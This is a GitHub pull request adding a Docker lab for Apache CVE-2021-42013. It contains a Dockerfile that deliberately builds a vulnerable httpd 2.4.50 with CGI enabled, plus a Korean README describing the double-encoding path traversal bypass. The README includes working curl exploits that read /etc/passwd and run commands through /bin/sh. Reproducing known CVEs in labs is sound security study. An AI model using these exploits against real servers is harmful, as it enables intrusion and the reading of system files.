Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

[조동균/Refrian4]:apache CVE-2021-42013 분석 및 결과 #172

Open
wants to merge 6 commits into
base: main
Choose a base branch
from
Open

[조동균/Refrian4]:apache CVE-2021-42013 분석 및 결과 #172

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
6 commits
Select commit Hold shift + click to select a range
6a2a0bb
[조동균/Refrain4] apache CVE-2021-42013 분석 및 결과
Refrain4 May 4, 2024
4c5725b
Create README.md
Refrain4 May 4, 2024
15ad41b
Add files via upload
Refrain4 May 4, 2024
124ace3
Update README.md
Refrain4 May 4, 2024
72d8e31
Update README.md
Refrain4 May 4, 2024
b9fe2f4
Update README.md
Refrain4 May 4, 2024
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
14 changes: 14 additions & 0 deletions apache/CVE-2021-42013/Dockerfile
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,14 @@
FROM vulhub/httpd:2.4.50

LABEL maintainer="phithon <root@leavesongs.com>"

RUN set -ex \
&& sed -i "s|#LoadModule cgid_module modules/mod_cgid.so|LoadModule cgid_module modules/mod_cgid.so|g" /usr/local/apache2/conf/httpd.conf \
&& sed -i "s|#LoadModule cgi_module modules/mod_cgi.so|LoadModule cgi_module modules/mod_cgi.so|g" /usr/local/apache2/conf/httpd.conf \
&& sed -i "s|#Include conf/extra/httpd-autoindex.conf|Include conf/extra/httpd-autoindex.conf|g" /usr/local/apache2/conf/httpd.conf \
&& cat /usr/local/apache2/conf/httpd.conf \
| tr '\n' '\r' \
| perl -pe 's|<Directory />.*?</Directory>|<Directory />\n AllowOverride none\n Require all granted\n</Directory>|isg' \
| tr '\r' '\n' \
| tee /tmp/httpd.conf \
&& mv /tmp/httpd.conf /usr/local/apache2/conf/httpd.conf
23 changes: 23 additions & 0 deletions apache/CVE-2021-42013/README.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,23 @@
---

**요약**

- CVE-2021-42013은 CVE-2021-41773의 불완전한 수정으로 인해 발생한 취약점
- Apache는 기본적으로 상위 디렉토리를 의미하는 문자열 “../”에 대한 문자열을 차단함
- 그러나 URL 인코딩을 통해 우회가 가능함
- 기존의 URL 인코딩으로 인해 발생한 취약점을 패치했지만 URL 더블 인코딩으로 우회가 가능한 취약점 발생

**환경 구성 및 실행**

- `docker-compose build`
- `docker-compose up -d`
- `apt install curl` 커맨드로 curl 설치
- /icons 디렉토리를 만든 후 아래와 같은 명령어 실행
- curl -v --path-as-is [http://your-ip:8080/icons/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd](http://your-ip:8080/icons/.%25%32%65/.%25%32%65/.%25%32%65/.%25%32%65/.%25%32%65/.%25%32%65/.%25%32%65/etc/passwd)
- curl -v --data "echo;id" '[http://your-ip:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh](http://your-ip:8080/cgi-bin/.%25%32%65/.%25%32%65/.%25%32%65/.%25%32%65/.%25%32%65/.%25%32%65/.%25%32%65/bin/sh)

**결과**

![png1](https://github.com/Refrain4/kr-vulhub/assets/90193658/d929f6a8-3adf-4a5f-80e6-9b0b9da54680)

![png2](https://github.com/Refrain4/kr-vulhub/assets/90193658/8106019f-0444-48ee-9ab0-ebd6f856c1dd)
6 changes: 6 additions & 0 deletions apache/CVE-2021-42013/docker-compose.yml
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,6 @@
version: '2'
services:
apache:
build: .
ports:
- "8080:80"
Binary file added apache/CVE-2021-42013/png1.png
View file
Open in desktop
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added apache/CVE-2021-42013/png2.png
View file
Open in desktop
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.